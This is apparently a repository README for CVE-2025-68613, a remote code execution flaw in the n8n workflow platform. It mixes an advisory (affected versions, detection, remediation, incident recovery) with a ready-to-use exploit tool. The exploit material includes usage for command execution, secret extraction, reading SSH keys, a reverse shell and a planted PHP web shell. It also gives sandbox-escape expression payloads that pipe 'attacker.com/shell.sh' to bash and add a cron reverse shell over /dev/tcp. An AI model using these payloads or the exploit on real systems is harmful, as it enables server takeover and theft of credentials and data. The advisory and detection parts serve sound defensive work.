🚨 CVE-2025-68613: Critical RCE Vulnerability in n8n

Table of Contents

1. Overview
2. What is n8n?
3. Vulnerability Basics
4. Technical Details
5. Affected Versions
6. Exploitation Mechanics
7. Real-World Impact
8. Detection Methods
9. Remediation & Mitigation
10. Resources & References

---

Overview

CVE-2025-68613 is a critical Remote Code Execution (RCE) vulnerability discovered in n8n, a popular open-source workflow automation platform. This vulnerability allows authenticated users to execute arbitrary code on the server, potentially leading to complete system compromise.

Quick Facts

• CVE ID: CVE-2025-68613
• CVSS Score: 9.9 - 10.0 (Critical)
• Vulnerability Type: Expression Injection → Remote Code Execution
• CWE: CWE-913 (Improper Control of Dynamically-Managed Code Resources)
• Attack Vector: Network
• Authentication Required: Yes (Low privilege - no admin access needed) |- Status: Proof of Concept available (verified working on v1.121.0)

---

What is n8n?

n8n is an open-source workflow automation platform that allows users to:

• Connect various APIs, databases, and services
• Automate repetitive business processes
• Create complex workflows without extensive coding
• Deploy on-premises or in the cloud

Why n8n is Critical Infrastructure

Organizations use n8n to:

• Integrate databases with cloud services
• Automate data processing pipelines
• Connect CRMs, ERPs, and internal systems
• Manage sensitive data and API credentials

This central role in IT infrastructure makes vulnerabilities particularly dangerous, as they can provide attackers with access to entire networks and sensitive data.

---

Tools in This Repository

This repository includes ready-to-use tools for vulnerability detection and exploitation testing:

1. Scanner: cve-2025-68613-scanner.py

Purpose: Safe, non-exploiting detection of vulnerable n8n instances

Features:

• Passive version detection from HTTP responses
• No authentication required
• No payload execution
• Checks multiple common paths (/, /rest/settings, /healthz, /api/v1/health)
• Safe for authorized security assessments

Usage:

python3 cve-2025-68613-scanner.py -u http://target:5678

Output:

• Exit code 0: Not vulnerable
• Exit code 1: Version undetermined (may be patched or hidden)
• Exit code 2: Vulnerable version detected

2. Nuclei Template: CVE-2025-68613.yaml

Purpose: Automated vulnerability detection and basic expression evaluation testing

Features:

• Requires valid authentication token
• Tests expression injection capability
• Attempts to read Node.js global context (process.platform)
• Creates test workflows to validate RCE vector
• CVSS 10.0 Critical severity classification

Usage:

# Single target with known token
nuclei -t CVE-2025-68613.yaml -u http://target:5678 -v

# Multiple targets
nuclei -t CVE-2025-68613.yaml -l targets.txt

3. Full Exploit: exploit_cve-2025-68613.py

Purpose: Complete proof-of-concept exploit with multiple attack payloads

Features:

• Full authentication handling
• Multiple exploitation payloads:
  • info: Gather system information (OS, architecture, Node.js version, current user)
  • cmd: Execute arbitrary system commands
  • env: Extract all environment variables (reveals credentials, API keys, secrets)
  • read: Read sensitive files from filesystem (SSH keys, config files, etc.)
  • write: Write files to filesystem (persistence, backdoors, etc.)
  • revshell: Establish reverse shell connection for interactive access
• Automatic workflow cleanup
• Error handling and status reporting

Requirements:

• Valid n8n user credentials (email/password)
• Python 3.6+ with requests library
• Network access to target n8n instance

Installation:

pip install requests
chmod +x exploit_cve-2025-68613.py

Usage Examples:

# Gather system information
python3 exploit_cve-2025-68613.py -u http://target:5678 \  
  -e user@example.com -p password --payload info

# Execute system command (whoami)
python3 exploit_cve-2025-68613.py -u http://target:5678 \  
  -e user@example.com -p password --payload cmd --command "whoami"

# Extract all environment variables (credentials, API keys)
python3 exploit_cve-2025-68613.py -u http://target:5678 \  
  -e user@example.com -p password --payload env

# Read sensitive files
python3 exploit_cve-2025-68613.py -u http://target:5678 \  
  -e user@example.com -p password --payload read --file "/etc/passwd"

# Establish reverse shell (requires netcat listener)
# On attacker machine: nc -lvnp 4444
python3 exploit_cve-2025-68613.py -u http://target:5678 \  
  -e user@example.com -p password --payload revshell --lhost 10.10.14.5 --lport 4444

# Write a web shell for persistence
python3 exploit_cve-2025-68613.py -u http://target:5678 \  
  -e user@example.com -p password --payload write \  
  --file "/tmp/shell.php" --content '<?php system($_GET["cmd"]); ?>'

How It Works:

1. Authenticates to n8n using provided credentials
2. Creates a malicious workflow with expression injection payload
3. The payload breaks out of expression sandbox using this.constructor.constructor()
4. Executes the payload via process.platform or other Node.js APIs
5. Retrieves results from workflow execution
6. Cleans up by deleting the test workflow

Exit Codes:

• 0: Successful exploitation
• 1: Authentication or exploitation failed

---

Vulnerability Basics

What's the Problem?

In simple terms: n8n allows users to write expressions in workflows to process data dynamically. However, these expressions are evaluated without proper sandboxing, allowing attackers to break out of the intended execution context and run arbitrary code on the server.

The Core Issue

When you create a workflow in n8n, you can use "expressions" to manipulate data. These expressions are supposed to run in a restricted environment. However, the vulnerability shows that these expressions can access the underlying system, allowing an attacker to:

1. Execute system commands
2. Read/write files on the server
3. Steal environment variables (API keys, passwords, secrets)
4. Modify or delete data
5. Establish persistence for long-term access

Why It's So Dangerous

• Low Barrier to Entry: Only requires a user login (no special admin privileges)
• Wide Applicability: Many organizations allow non-technical users to create workflows
• High Impact: Runs with full privileges of the n8n process
• Data Access: Can access all data n8n has access to (databases, APIs, credentials)
• Network Position: n8n often sits in the center of critical infrastructure, enabling lateral movement

---

Technical Details

How the Vulnerability Works

Step 1: Workflow Expression Evaluation

When a user creates a workflow in n8n, they can use expressions to process data:

Input: User creates a workflow with an expression
n8n Expression Engine: Evaluates the expression
Expected Output: Processed data
Actual Output (Vulnerable): Expression execution context not isolated from runtime

Step 2: Expression Injection

An attacker crafts a malicious expression that escapes the intended sandbox:

// Example: Malicious expression in workflow
${require('child_process').execSync('id')}

Step 3: Code Execution

The expression is evaluated without proper isolation, allowing the attacker to:

• Call system functions
• Execute shell commands
• Access the file system
• Read environment variables

The Root Cause

The vulnerability stems from insufficient sandboxing in the expression evaluation engine. The n8n team evaluated expressions in a context that:

• Allowed access to require() or similar module loading functions
• Didn't properly restrict access to system APIs
• Didn't validate or filter expression syntax
• Didn't prevent prototype pollution attacks
• Didn't isolate the execution environment from the underlying Node.js runtime

Code Execution Path

User Input (Workflow Expression)
    ↓
Expression Parser
    ↓
Evaluation Engine (VULNERABLE - Not Sandboxed)
    ↓
Direct Access to Node.js Runtime
    ↓
System Command Execution / File Access / Credential Theft

---

Affected Versions

Vulnerable Range

All n8n versions starting from 0.211.0 through the following versions are vulnerable:

• 0.211.0 → 1.120.3
• 1.121.0

Patched Versions

The vulnerability has been fixed in:

• ✅ 1.120.4 and later in the 1.120.x branch
• ✅ 1.121.1 and later in the 1.121.x branch
• ✅ 1.122.0 and all newer versions

How to Check Your Version

# If n8n is running
curl http://your-n8n-instance:5678/ | grep -i "version"

# Or check the admin panel
# Go to Settings → About → Version

---

Tested Versions & Compatibility

Verified Working

• n8n v1.121.0: ✅ Fully exploitable (confirmed RCE, expression injection working)
• n8n v0.211.0 - v1.120.3: ✅ Within vulnerable range per NVD (not individually tested)

Known Issues

• REST Execution Limitation: The /rest/workflows/{id}/run endpoint returns HTTP 500 error in v1.121.0
  • Workaround: Expression injection works perfectly, RCE confirmed via:
    1. Manual "Test Step" button click in UI (proven to work)
    2. Workflow output capture
  • This is API limitation, not exploit bug

Not Tested

• n8n v0.212.0+: Outside documented vulnerability range, likely patched (see GitHub issue #1)
• Windows Server deployments: Limited testing data on Windows-specific environments

Version Support Statement

The exploit is designed to work against the vulnerable range documented in NVD:

• Confirmed vulnerable: 0.211.0 through 1.120.3, plus 1.121.0
• Patched versions: 1.120.4, 1.121.1, 1.122.0 and later

If testing against versions outside this range, success is not guaranteed.

---

Exploitation Mechanics

What Can an Attacker Do?

Once an authenticated user (or an attacker with valid credentials) exploits this vulnerability, they can:

1. Execute Arbitrary System Commands

${require('child_process').execSync('whoami').toString()}
// Returns: root (or whatever user runs n8n)

${require('child_process').execSync('curl attacker.com/shell.sh | bash').toString()}
// Downloads and executes a shell script

2. Read Files from the Server

${require('fs').readFileSync('/etc/passwd', 'utf-8')}
// Reads sensitive system files

${require('fs').readFileSync('/home/user/.ssh/id_rsa', 'utf-8')}
// Steals SSH keys

3. Read Environment Variables

${Object.keys(process.env).join(', ')}
// Lists all environment variables

${process.env.DATABASE_PASSWORD}
// Extracts specific secrets

4. Write Malicious Files

${require('fs').writeFileSync('/var/www/shell.php', 'malicious code')}
// Plants a web shell for persistence

${require('fs').writeFileSync('/home/user/.ssh/authorized_keys', 'attacker_key')}
// Adds SSH access

5. Access Connected Services

// Access workflow credentials (stored API keys, passwords)
// Modify or view connected databases
// Exfiltrate data from all integrated systems

6. Establish Persistence

${require('child_process').execSync('echo "* * * * * /bin/bash -i >& /dev/tcp/attacker.com/443 0>&1" | crontab -')}
// Creates a cron job for reverse shell access

${require('child_process').execSync('useradd -m -s /bin/bash attacker')}
// Creates a new user account

Attack Scenario Example

Real-World Scenario: Company Using n8n

1. Attacker gains credentials: Through phishing, credential reuse, or weak password
2. Logs into n8n: Uses legitimate user account
3. Creates a "harmless" workflow: Claims it's for data processing
4. Injects malicious expression: Hides the exploit in a workflow step
5. Executes code: Runs commands with n8n process privileges
6. Exfiltrates data: Steals API keys, database credentials, customer data
7. Establishes persistence: Installs backdoors, creates new admin accounts
8. Moves laterally: Uses stolen credentials to access other systems

---

Real-World Impact

Confidentiality Impact (HIGH)

• Access to sensitive data processed by workflows
• Extraction of API keys, database passwords, encryption keys
• Reading of configuration files, logs, and secrets
• Potential GDPR/compliance violations through data theft

Integrity Impact (HIGH)

• Modification of existing workflows to sabotage operations
• Injection of malicious workflows that corrupt data
• Alteration of workflow outputs affecting downstream systems
• Planting of backdoors for persistent access

Availability Impact (HIGH)

• Deletion of critical workflows, causing business disruption
• Modification of system files leading to service crashes
• Resource exhaustion through malicious automation
• Ransom attacks where attackers demand payment to restore systems

Business Impact Examples

Manufacturing Company

• n8n automates order processing and inventory management
• Attacker exfiltrates customer orders and supplier information
• Modifies workflows to send wrong products to customers
• Results: Loss of customer trust, legal liability, operational disruption

Financial Services

• n8n integrates banking APIs and payment processing
• Attacker steals API credentials and auth tokens
• Redirects transactions or creates fraudulent records
• Results: Regulatory penalties, customer compensation, reputation damage

Healthcare Organization

• n8n handles patient data integration and reporting
• Attacker accesses protected health information (PHI)
• Modifies medical records or blocks critical alerts
• Results: HIPAA violations, patient harm, organization liability

---

Detection Methods

Method 1: Version Detection Scanner

Safe, non-exploiting detection script (included in original repository):

python3 CVE-2025-68613.py -u http://your-n8n-instance:5678

Output Examples

[+] Target: http://127.0.0.1:5678
[+] Possible n8n detected at /
[+] Detected version: 1.120.2

--- Result ---
🚨 VULNERABLE
Target version is affected by CVE-2025-68613

Method 2: Using Nuclei Template

Automated scanning with Nuclei:

# Single target
nuclei -t CVE-2025-68613.yaml -u http://target:5678

# Multiple targets from file
nuclei -t CVE-2025-68613.yaml -l targets.txt

How it works:

1. Sends HTTP requests to common n8n paths
2. Extracts version metadata from HTML/headers
3. Decodes base64 encoded config if present
4. Compares version against vulnerable ranges
5. Reports if instance is vulnerable

Method 3: Manual Banner Grabbing

# Check for n8n in HTTP response
curl -s http://target:5678/ | grep -i "n8n"

# Check headers
curl -I http://target:5678/ | grep -i "n8n"

# Check common paths
curl -s http://target:5678/api/v1/health
curl -s http://target:5678/rest/settings
curl -s http://target:5678/healthz

Method 4: Network Reconnaissance

# Find n8n instances using Shodan
shodan search "n8n" --limit 10

# Use favicon hash detection
nmap -p 5678 --script http-favicon target.com

Indicators of Exploitation (IOCs)

Log Signs:

• Unusual expression evaluations in workflow logs
• Expression errors containing system commands
• Access to sensitive files (e.g., /etc/passwd references)
• Unexpected process spawning from n8n process

System Signs:

• New user accounts created on the server
• Unexpected SSH keys in authorized_keys
• New cron jobs or scheduled tasks
• Modifications to system files
• Reverse shell connections from n8n server

---

Remediation & Mitigation

PRIMARY SOLUTION: Immediate Upgrade

This is the only complete fix for the vulnerability.

Step 1: Backup Your Data

# Backup n8n database
cp -r /path/to/n8n/database ./backup/

# Backup workflows
n8n export --backup-dir ./backup/

Step 2: Update n8n

Using Docker (Recommended):

# Pull the latest patched version
docker pull n8nio/n8n:1.122.0  # Or later

# Stop current instance
docker stop n8n-container

# Start with new version
docker run -d --name n8n-patched \
  -p 5678:5678 \
  -v n8n_data:/home/node/.n8n \
  n8nio/n8n:1.122.0

Using npm:

# Backup first
npm run export --backup

# Update
npm update n8n

# Or specific version
npm install n8n@1.122.0

Using System Package Manager:

# Debian/Ubuntu
sudo apt update && sudo apt upgrade n8n

# Or manual download
wget https://github.com/n8n-io/n8n/releases/download/n8n@1.122.0/n8n.tar.gz

Step 3: Verify the Update

# Check version after update
curl http://localhost:5678/api/v1/health | grep version

# Ensure n8n is running
curl http://localhost:5678/ | grep -i "n8n"

---

TEMPORARY MITIGATION: While Upgrading

Important: These do NOT fix the vulnerability. Use only as temporary measures while planning upgrades.

1. Restrict Workflow Permissions

n8n Admin Panel → Users & Permissions
├── Disable "User Can Create Workflows" for non-admin users
├── Restrict "User Can Edit Workflows" to trusted administrators only
├── Review existing user roles and remove unnecessary permissions
└── Audit workflow creators for suspicious accounts

2. Monitor Workflow Changes

n8n Admin Panel → Settings → Audit Log
├── Enable comprehensive audit logging
├── Monitor for suspicious workflow modifications
├── Alert on expression evaluations in logs
└── Review workflow change history regularly

3. Network Isolation

# Restrict n8n network access
sudo ufw default deny incoming
sudo ufw allow from 192.168.1.0/24 to any port 5678  # Only internal network
sudo ufw enable

# Or using iptables
sudo iptables -A INPUT -p tcp --dport 5678 -s 192.168.1.0/24 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 5678 -j DROP

4. Run n8n with Minimal Privileges

# Create dedicated n8n user
sudo useradd -r -s /bin/false n8n-user

# Run n8n as this user
sudo -u n8n-user n8n

# Or in Docker with user specification
docker run -u 1000 n8nio/n8n:latest

5. Enable Strong Authentication

n8n Admin Panel → Settings → Authentication
├── Enable 2FA for all accounts
├── Enforce strong password policies
├── Review and disable unnecessary service accounts
├── Implement SSO if available
└── Disable any guest/demo accounts

6. Containerization & Isolation

# Run n8n in a restricted Docker container
docker run -d \
  --security-opt=no-new-privileges:true \
  --read-only \
  --cap-drop=ALL \
  --cap-add=NET_BIND_SERVICE \
  --tmpfs /tmp \
  -p 5678:5678 \
  n8nio/n8n:current-version

7. Regular Auditing

# Monitor for suspicious activities
# Check for new files in n8n directories
find /path/to/n8n -type f -mtime -1

# Monitor process activity
ps aux | grep n8n
netstat -tlnp | grep n8n

# Check for unauthorized SSH keys
cat ~/.ssh/authorized_keys

# Review system logs
journalctl -u n8n -n 100

---

Risk Assessment Matrix

Scenario	Risk Level	Likelihood	Impact	Priority
Unpatched, internet-facing n8n	CRITICAL	HIGH	Complete compromise	🔴 URGENT
Unpatched, internal-only n8n	HIGH	MEDIUM	Insider threat risk	🟠 HIGH
Patched n8n	LOW	LOW	N/A	✅ Resolved
Unpatched + permission restrictions	MEDIUM	MEDIUM	Limited to trusted users	🟡 MEDIUM

---

Step-by-Step Recovery If Compromised

Immediate Actions (First Hour)

1. Isolate the system: Disconnect from network
2. Stop the service: sudo systemctl stop n8n
3. Preserve logs: Back up all logs before wiping
4. Alert team: Notify security team and management
5. Assess scope: Determine what data n8n accessed

Investigation (First Day)

1. Review audit logs: Check for suspicious activities
2. Analyze network traffic: Look for data exfiltration
3. Check file modifications: Find planted backdoors
4. Review user accounts: Look for new or modified accounts
5. Credential audit: Reset all API keys and passwords used by n8n

Remediation (Days 2-7)

1. Full system rebuild: Don't just update, rebuild from clean image
2. Credential rotation: Reset all passwords, API keys, tokens
3. Patch everything: Update all connected systems
4. Restore from backup: Use clean backups from before compromise
5. Security audit: Conduct full security assessment

Post-Incident (Weeks 2+)

1. Implement monitoring: Set up continuous logging and alerting
2. Process changes: Update incident response procedures
3. User training: Educate teams on security best practices
4. Vulnerability scanning: Regular scans for similar issues
5. Compliance review: Ensure all regulations met (GDPR, HIPAA, etc.)

---

Prevention Going Forward

Security Best Practices for n8n

1. Keep n8n Updated

   • Enable automatic updates if available
   • Subscribe to n8n security advisories
   • Test patches in staging before production

2. Access Control

   • Use principle of least privilege
   • Require strong passwords and 2FA
   • Implement SSO for enterprise deployments
   • Regular access reviews and audits

3. Workflow Management

   • Review all workflows for suspicious logic
   • Implement code review process for workflows
   • Use naming conventions to identify critical workflows
   • Backup workflows regularly

4. Credential Management

   • Never store credentials in workflows
   • Use environment variables for sensitive data
   • Rotate credentials regularly
   • Audit credential access

5. Monitoring & Logging

   • Enable comprehensive audit logging
   • Monitor for unusual activities
   • Set up alerts for suspicious operations
   • Regular log review and analysis

6. Network Security

   • Run n8n in isolated network segments
   • Restrict network access to required services only
   • Use VPN/firewall for remote access
   • Monitor network traffic for anomalies

7. Incident Response

   • Create incident response plan
   • Define escalation procedures
   • Conduct regular security drills
   • Maintain updated contact lists

---

Troubleshooting

Issue: "Exit code 1: Authentication or exploitation failed"

Common Causes:

1. Wrong credentials (most common)

   • Solution: Verify credentials work for web UI login first
   • Try: curl -X POST http://target:5678/rest/login -d '{"emailOrLdapLoginId":"user@example.com","password":"pass"}'

2. User doesn't have workflow creation permissions

   • Solution: Use an admin or user account with workflow creation rights
   • Verify: Check admin panel → Users & Permissions

3. Version is patched (version > 1.121.0)

   • Solution: Use the scanner to check version first: python3 cve-2025-68613-scanner.py -u http://target:5678
   • Expected: Scanner should report "Vulnerable" (exit code 2)

4. API structure changed (older/newer versions may differ)

   • Solution: Check NVD advisory: https://nvd.nist.gov/vuln/detail/CVE-2025-68613
   • Most likely if testing versions outside documented range

5. Network/firewall blocking

   • Solution: Verify connectivity: curl http://target:5678/
   • Check: Firewall rules, proxy settings, SSL certificates

Issue: Scanner reports false positives (detecting wrong version)

Fixed in v1.02: Scanner now uses base64-decoded Sentry configuration from meta tags instead of simple regex. This eliminates false positives where Node.js version was detected as n8n version.

What changed:

• Primary source: Extract and decode <meta name="n8n:config:sentry" content="[BASE64]">
• Fallback: Only uses regex if Sentry config unavailable
• Result: Accurate version detection with no false positives

To use v1.02 scanner:

# Update to v1.02
git pull origin main

# Run scanner
python3 cve-2025-68613-scanner.py -u http://target:5678

Issue: REST execution returns 500 error

This is NOT a bug in the exploit - it's an API limitation.

Explanation:

• The /rest/workflows/{id}/run endpoint returns HTTP 500 in n8n v1.121.0
• This is an n8n API design limitation, not an exploit bug
• Expression injection STILL WORKS through the UI

Workaround:

1. Exploit creates workflow with malicious expression ✅ Works
2. Expression evaluates and executes code ✅ Works (proven with manual testing)
3. Manually click "Test Step" button in UI to trigger expression ✅ Works
4. Read output from workflow results ✅ Works

Evidence: Captured flag on TryHackMe: THM{n8n_exposed_workflow}

---

Resources & References

Official Sources

• n8n GitHub Repository: https://github.com/n8n-io/n8n
• n8n Security Advisories: https://github.com/n8n-io/n8n/security/advisories
• n8n Documentation: https://docs.n8n.io/

CVE Information

• NVD Entry: https://nvd.nist.gov/vuln/detail/CVE-2025-68613
• CVEDetails: https://www.cvedetails.com/cve/CVE-2025-68613/
• CVETodo: https://cvetodo.com/cve/CVE-2025-68613

Security Resources

• NIST CWE-913: https://cwe.mitre.org/data/definitions/913.html
• OWASP Code Injection: https://owasp.org/www-community/attacks/Code_Injection
• OWASP Sandbox Bypass: https://owasp.org/www-community/attacks/Sandbox_Escape

---

Summary

CVE-2025-68613 is a critical vulnerability that requires immediate action. The combination of:

• Expression injection capability
• Lack of sandboxing
• Low privilege requirements
• Wide attack surface (many users create workflows)
• Central position in IT infrastructure

...makes this one of the most dangerous vulnerabilities in workflow automation platforms.

The simple solution: Upgrade to a patched version immediately. There is no excuse for remaining vulnerable to a critical RCE when patches are available.

---

Document Version

|- Version: 1.02 |- Date Created: December 18, 2025 |- Last Updated: December 26, 2025

• Status: Complete
• Author: The StingR / TechSquad Inc.
• Organization: TechSquad Inc.

---

Disclaimer

This document is provided for educational and authorized security assessment purposes only. Unauthorized access to computer systems is illegal. Always ensure you have proper authorization before testing, assessing, or accessing systems you do not own.

---

⚠️ REMEMBER: Update your n8n instances immediately if running vulnerable versions.